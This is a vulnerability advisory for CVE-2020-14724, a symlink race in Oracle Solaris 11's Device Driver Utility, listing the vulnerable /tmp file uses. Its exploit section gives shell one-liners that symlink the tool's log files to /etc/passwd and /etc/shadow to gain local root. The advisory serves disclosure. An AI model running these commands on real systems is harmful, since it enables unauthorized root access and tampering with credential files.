Advisory #: 212
Title: Insecure /tmp file use in Oracle Solaris 11 Device Driver Utility v1.3.1 leads to root
Author: Larry W. Cashdollar, @_larry0
Date: 2020-02-02
CVE-ID:[CVE-2020-14724]
CWE:
Download Site: https://docs.oracle.com/cd/E37838_01/html/E69250/useddu.html
Vendor: Oracle
Vendor Notified: 2020-02-02
Vendor Contact: secalert_us@oracle.com
Advisory:
Description: "The Device Driver Utility provides information about the devices on your installed system and the drivers that manage those devices. The DDU reports whether the currently booted operating system has drivers for all of the devices that are detected in your system. If a device does not have a driver attached, the Device Driver Utility recommends a driver package to install."
Vulnerability:
Append contents of ddu_log to system files via symlink attack: In ./ddu-text/utils/ddu-text.py 18 LOG_LOCATION = "/tmp/ddu_log" . 45: print _("Exiting Text Installer. Log is available at:\n%s") % LOG_LOCATION 50: logging.basicConfig(filename=LOG_LOCATION, level=LOG_LEVEL, Elevation of priviledges via symlink attack due to chmod operation on /tmp file: In file ./ddu-text/utils/inner_window.py 667: logfile = open('/tmp/ddu_err.log', 'a') 695: logfile = open('/tmp/ddu_err.log', 'a') 721: logfile = open('/tmp/ddu_err.log', 'a') 748: logfile = open('/tmp/ddu_err.log', 'a') In file ./scripts/comp_lookup.sh 33:typeset err_log=/tmp/ddu_err.log In file ./scripts/det_info.sh 38:typeset err_log=/tmp/ddu_err.log In file ./scripts/pkg_relate.sh 449:typeset err_log=/tmp/ddu_err.log In file ./scripts/find_media.sh 20:typeset err_log=/tmp/ddu_err.log There is a race condition here between file creation and chmod 666 where a local user can run a simple script to ensure the symlink exists after the ddu_err.log file is removed: In file ./scripts/probe.sh 569: # Make /tmp/ddu_err.log writable for every user 571: if [ -f /tmp/ddu_err.log ]; then 572: pfexec chmod 666 /tmp/ddu_err.log 574: touch /tmp/ddu_err.log; chmod 666 /tmp/ddu_err.log 636:typeset err_log=/tmp/ddu_err.log These are also potential file clobbering issues: From probe.sh 131: NIC_info_file=/tmp/dvt_network_info_file 133: temp_file=/tmp/dvt_network_temp 134: temp_file_2=/tmp/dvt_network_temp_2 207: c_file=/tmp/str_ctrl_file 208: c_file1=/tmp/str_ctrl_file_1 209: c_file2=/tmp/str_ctrl_file_2 210: c_file3=/tmp/str_ctrl_file_3 211: c_file4=/tmp/str_ctrl_file_4 212: c_file5=/tmp/str_ctrl_file_5 328: dvt_cd_dev_tmpfile=/tmp/dvt_cd_dev_tmpfile 329: dvt_cd_ctl_tmpfile=/tmp/dvt_cd_ctl_tmpfile 330: dvt_cd_ctl_tmpfile1=/tmp/dvt_cd_ctl_tmpfile1 398: temp_file1=/tmp/dvt_tmp_file1 399: temp_file2=/tmp/dvt_tmp_file2 462: cpu_tmpfile=/tmp/cpu_tmpfile 490: memory_tmpfile=/tmp/memory_tmpfile 624:typeset ctl_file=/tmp/dvt_ctl_file
Export: JSON TEXT XML
Exploit Code:
  1. Tested on Solaris 11 x86
  2. larry@SolSun:~$ uname -a
  3. SunOS SolSun 5.11 11.4.0.15.0 i86pc i386 i86pc
  4. and
  5. Open Indiana
  6. root@openindiana:/export/home/larry# uname -a
  7. SunOS openindiana 5.11 illumos-1b500975aa i86pc i386 i86pc
  8.  
  9. Append content to /etc/passwd
  10. larry@openindiana:/tmp$ ln -s /etc/passwd ddu_log
  11.  
  12. To get local root simply have ddu chmod 666 /etc/shadow
  13. larry@openindiana:/tmp$ while true; do ln -s /etc/shadow ddu_err.log; done
  14.  
  15. A better exploit:
  16. https://github.com/lcashdol/Exploits/tree/master/ddu-exploit
  17.  
Screen Shots:
Notes:
https://github.com/OpenIndiana/ddu/commit/31dca7f6bee738980ecabefadedd01fcc3f3acf6